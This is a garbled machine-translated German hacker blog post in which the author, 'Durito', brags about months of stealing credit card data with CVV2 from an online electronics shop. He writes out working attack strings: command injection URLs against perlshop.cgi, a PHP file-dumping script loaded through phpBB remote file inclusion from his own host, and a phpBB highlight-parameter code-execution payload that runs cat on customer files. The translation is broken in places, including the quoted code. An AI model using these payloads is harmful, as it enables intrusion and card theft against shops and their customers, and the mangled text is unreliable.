|
In den tiefen meiner Kindheit, wenn es nicht ein Haufen Freaks Zusammenbruch der Sowjetunion sind, hörte ich den Satz "Schlacht der Ernte".
Und nun, da ich diesen Artikel schreibe, wurde mir klar , dass dieser Satz , und es wird der Titel sein.
Sie wissen wahrscheinlich , dass die Hacker - Gewinn, der Wirtschaft und nicht episodisch, zugleich Geld für Essen, Bier und andere Freuden werden immer gebraucht.
Die meisten Kunden kontaktieren Sie mich fragt sofort knacken paypal.com oder ebay.com, was darauf hindeutet, vielleicht, dass zumindest der göttlichen Ursprung der Hacker und Mine im Besonderen.
Ständig auch ihr Blut Hacker nur haben kann , wenn die sofortigen Zugriff erhalten den Einkaufswagen mehrere Läden durchschnittliche tägliche Ernte von ihnen zu entfernen und für immergrün Einheit auf einem der Krempel Foren wie Carder-World.ru auszutauschen.
Heute sind die Bemühungen der Bundessicherheitsdienst geschlossen fast alle Foren Kardieren, einschließlich Carder-World.ru, es wäre besser , verschanzte Wahhabiten und Kämpfer gefangen, "Helden von Mantel und Degen."
Und ich möchte mit dem Verwalter eines solchen Geschäft die Geschichte eines langen Wettbewerb zu erzählen, die Elektronik verkauft.
Episode One.
Vor über einem Jahr entdeckte ich eine Sicherheitslücke in einem Skript perlshop.cgi version = 3.1
http://www.xakep.ru/post/21567/default.asp
das Wesen der Fehler lag in der Tatsache , dass es möglich war , Befehle auf dem Server auszuführen:
/perlshop.cgi?ACTION=enter&thispage=|ls;&ORDER_ID=!ORDERID!
Ansicht Quellcode zeigte , dass die Öffnung der Dateien im Katalogverzeichnis für Zeichen ohne Prüfung erfolgt |
;
if (defined ($ input { ' Thispage'})) {### einen Katalog Seite senden zurück mit der eindeutigen ID - Set
$ Prev_page = "";
$ Next_page = "";
if ($ add_navigation eq 'ja' ) {
$ Catalog_page = "$ catalog_directory / $ input { 'Thispage"} ";
if (-e $ catalog_page) {
offen (TEMPLATE, $ catalog_page) ||
& Err_trap ( "nicht öffnen können Template - Datei: $ catalog_page");
$ Temp = <TEMPLATE>;
if ($ temp = ~ / < (\ \ - \ -?) PSTAG \ s + PrevPage \ s * = \ s * \ "? ([^ \"] +) \ "\ s + next \ s ?? * = \ s * \ "( [^ \?"] +?) \ "\ s *? (\ - \ -)> / i?
Nachdem alle bazhnye Geschäfte Überprüfung gelang es mir , eine , in der der Administrator trotz des Verbots zu finden, Kreditkarten mit CVV2 gehalten.
Zu wissen , dass die Basis mit dem standardmäßig im Verzeichnis Kunden gespeichert Credo, ich jeden Tag eine neue Ernte von so einfache Weise abholen:
/perlshop.cgi?ACTION=ENTER&thispage=|cat%20customers/*;&ORDER_ID=!ORDERID!
Leider war der Server weder irgendwelche wget Links, die Schale gießen und Fuß zu fassen , dort zu gewinnen, ich konnte es nicht.
Aber mein Glück hielt nicht lange an , drei Monate nach dem Admin - Geschäft spürte etwas falsch war, und sobald das Herunterladen der URL statt cred ich sah "oblomingo Vogel."
Admin ersetzt auf dem Wagen version = 4.4.0.
Finden sie in das Internet und den Quellcode sehen, erkannte ich , dass es nicht meine Freude sein wird, |
Er wurde geschnitten:
offen (TEMPLATE, $ catalog_page) oder
error_trap ( "nicht öffnen können Template - Datei $ catalog_page: $!");
----------
gelöscht
----------
# Ungültige Zeichen aus dem Thispage Parameter entfernen
$ Input { 'Thispage'} = ~ s / [| () <>; &] // g;
Es ist wahr , im Skript gibt es keine Kontrolle über die "Null-Byte - Gift".
Aber wie ich sie verstehe, aufgrund der Tatsache , dass das Skript nur offene Dateien aus dem Katalog Thispage sollte - offen (TEMPLATE, $ catalog_page ).
Eine Sekunde.
Der Hunger und die Kälte macht die Menschen härter denken.
Die Erkenntnis , dass ich den Haupteingang abgeschnitten, habe ich beschlossen , das Reserverad zu überprüfen.
Nachdem gebrochen Server ip ich sah , dass es mehr als hundert Websites aufgeführt.
Es gab bereits eine Chance.
Es hat mit der Arbeit an einem trüben Viewing begonnen.
Und einer von ihnen zeigte sich PhpBB 2.0.1.
eine Beschreibung des Fehlers zu finden, ich türmen schnell functions_selects.php ladbare Buggy Forum Skript install.php:
<? Php
$ Handle = opendir ( '/' );
echo "Verzeichnis Griff: $ handle \ n";
echo "Files: \ n";
while ($ file = readdir ($ handle)) {
print "$ file \ n";
$ F = fopen ( "/ $ file", "r");
fpassthru ($ f);
}
closedir ($ handle);
?>
Bay ihn auf durito.narod.ru Website enthält ein Verzeichnis und führen Sie den Befehl
/forum/install.php?m=http://durito.narod.ru/ bekam ich eine Auflistung der Wurzel.
Ändern der Art und Weise und füllt die geänderten Dateien zu durito.narod.ru ich zum gehüteten Kunden Verzeichnis und dessen Reichtum bekam.
Das Leben wird immer besser.
Aber nicht lange, fünf Monate Buggy Forum verschwunden.
Folge Dritter.
Immer essen wollen.
Und ich begann wieder Wolle Server - Sites auf das Vorhandensein von Bugs.
Wieder Glück PhpBB 2.0.8.
Und nur von SQL-Injektion in den Foren PhpBB 2.0.10 entdeckt.
mit der Beschreibung der Verwundbarkeit behandelt haben, falle ich wieder in das Innere des Servers.
Aber hier war ich zum ersten doofer warten, wandte sich Kunden aus einem leeren Ordner.
Der zweite Riemen ist nicht lange auf sich warten, Anzeigen von Dateien in Verzeichnissen yuzersky / home / imya_yuzera / zu geschlossen.
Anzeigen von Dateien konnten nur in der / public_html / sein.
Dann entschied ich mich Quellen zu suchen perlshop.cgi und zu verstehen , warum es keine Kredit war.
Admin erlitt eine Datenbank in / home / imya_yuzera / data / Kunden, zum Glück, ich war in der Lage , den Inhalt darin zu sehen.
? Opening viewtopic.php t = 7 & highlight =% 2527. $ Plakat = % 60 $ cmd% 60% 2527 & cmd = cat% 20 / home / imya_yuzera / data / Kunden / *;
Ich war sehr überrascht , auf der Basis nur 2 Kredit liegen.
Die Entscheidung , dass das Geschäft ruiniert war, ging ich ins Bett.
Ein paar Tage später ging ich zurück, und als er sah , dass der Wagen mehr Kredit, aber es war der andere Darlehen!
Ich begann , den Laden zu beobachten und festgestellt, dass etwa 07.30 der Administrator alle Daten über Transaktionen pro Tag von den Kunden entfernt einzige Ausnahme Ordner in der Auferstehung, so war dies der einzige Tag in der Woche , wenn ich nicht um 7 Uhr aufstehen haben und nicht auf einem Computer ausführen das würde die Ernte schnell Administrator wählen.
So lebten wir mit ihm "Seele zu Seele" für weitere sechs Monate, stand ich auf eine halbe Stunde , bevor sie, und wie in dem Sprichwort, erklärte : "Frühaufsteher -. , Dass Gott"
Und gestern, einige Bastard statt PhpBB 2.0.8 hat auf seiner Website vBulletin Version 3.0.8 setzen.
Wieder rosa Vogel oblomingo schwenkte meine Flügel.
Aber der Hacker - Vogel - Patienten und Haupt Kampf ist noch nicht vollständig für die Ernte mit dem Verwalter.
ZY
Kampf prodozhaetsya, heute habe ich ein weiteres Loch auf dem Host gefunden, wird aber darüber erzählen später
Ihr Fehler Durito.
_________________
ESSEN SIE DIE REICHEN!
|
Kommentare
Kommentar nicht vergessen , dass der Inhalt und der Ton Ihrer Nachrichten , die Gefühle von echten Menschen verletzen können, Respekt und Toleranz gegenüber seinen Gesprächspartnern, auch wenn Sie Ihr Verhalten in Bezug auf die Meinungsfreiheit ihre Meinung nicht teilen, und die Anonymität des Internets, ändert sich nicht nur virtuell, sondern realen Welt. Alle Kommentare werden aus dem Index, Spam - Kontrolle versteckt.